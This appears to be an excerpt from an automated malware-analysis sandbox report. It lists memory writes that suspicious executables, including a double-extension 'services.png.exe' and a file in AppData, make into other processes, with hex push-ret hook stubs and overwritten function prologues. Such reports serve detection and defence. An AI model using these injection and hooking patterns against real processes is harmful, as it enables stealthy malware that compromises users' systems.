Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 75C0B400 value: 68 C7 EE 39 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 75BF7D00 value: 68 01 EF 39 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 75509390 value: 68 FE CD 3B 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 74D8FF10 value: 68 B0 B4 3B 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 74D6A810 value: 68 20 B5 3B 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 76F03710 value: 68 37 A4 C9 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 76EDDE80 value: 68 A3 A5 C9 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 74DF4100 value: 68 AE A8 C9 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 74DF3330 value: 68 33 A9 C9 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 75AA4190 value: 68 99 A9 C9 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 75A90560 value: 68 B0 A9 C9 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 74D6EA60 value: 68 13 B9 CB 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 74D758A0 value: 68 4B B9 CB 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 74D6DFF0 value: 68 6C B9 CB 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 75A8EA50 value: 68 5D 12 CA 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 75A8E8E0 value: 68 9A 12 CA 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 75C0B390 value: 68 95 EE C9 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 75C0B400 value: 68 C7 EE C9 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 75BF7D00 value: 68 01 EF C9 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 75509390 value: 68 FE CD CB 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 74D8FF10 value: 68 B0 B4 CB 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5728 base: 74D6A810 value: 68 20 B5 CB 02 C3

Overwrites code with function prologues

Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 5D0000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 5D0011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A0010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A0046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A0052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A0060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A0098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A00A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A00B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A00C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A00D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A00DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A00EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A00FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A0119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A0129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A0137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A0145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A0151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A0179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: PID: 6516 base: 29A0187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: PID: 1460 base: 600000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: PID: 1460 base: 600011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3	Jump to behavior
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C60010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C6003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C60046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C60052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C60060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C6006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C6007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C6008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C60098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C600A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C600B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C600C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C600D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C600DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C600EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C600FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C6010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C60119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C60129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C60137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C60145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C60151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C6015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C6016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C60179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C60187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C70000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5012 base: 2C70011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED0010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED0046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED0052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED0060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED0098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED00A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED00B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED00C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED00D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED00DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED00EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED00FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED0119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED0129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED0137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED0145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED0151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED0179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2ED0187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2EE0000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4908 base: 2EE0011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 2300010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 230003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 2300046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 2300052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 2300060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 230006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 230007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 230008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 2300098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 23000A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 23000B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 23000C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 23000D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 23000DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 23000EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
